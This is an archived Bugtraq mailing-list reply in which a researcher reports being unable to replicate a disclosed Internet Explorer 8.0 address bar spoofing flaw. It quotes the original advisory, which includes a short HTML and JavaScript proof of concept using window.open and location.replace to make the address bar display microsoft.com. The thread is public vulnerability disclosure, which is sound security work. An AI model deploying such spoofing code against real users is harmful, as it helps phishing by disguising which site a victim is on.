Bugtraq mailing list archives

Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability

From: Shreyas Zare <shreyas () secfence com>
Date: Mon, 26 Jul 2010 22:00:34 +0530

cant replicate it on my test setup. is something missing?

Shreyas Zare

Sr. Information Security Researcher
Secfence Technologies
www.secfence.com



On Sat, Jul 24, 2010 at 4:38 PM,  <info () securitylab ir> wrote:

Spoof Code:

<script>
function Spoof() {
 oc=window.open('http://www.securitylab.ir/&apos;, '','location=1');
 oc.location.replace('http://www.microsoft.com/&apos;);
}
</script>
<p align="center">
<a href="javascript:void(0);" onClick="Spoof()">Go to the Securitylab.ir</a></p>


Discovered by: Pouya Daneshmand
http://Securitylab.ir/Advisories

Current thread:

Internet Explorer 8.0 Address Bar Spoofing Vulnerability info (Jul 26)
- Re: Internet Explorer 8.0 Address Bar Spoofing Vulnerability Shreyas Zare (Jul 26)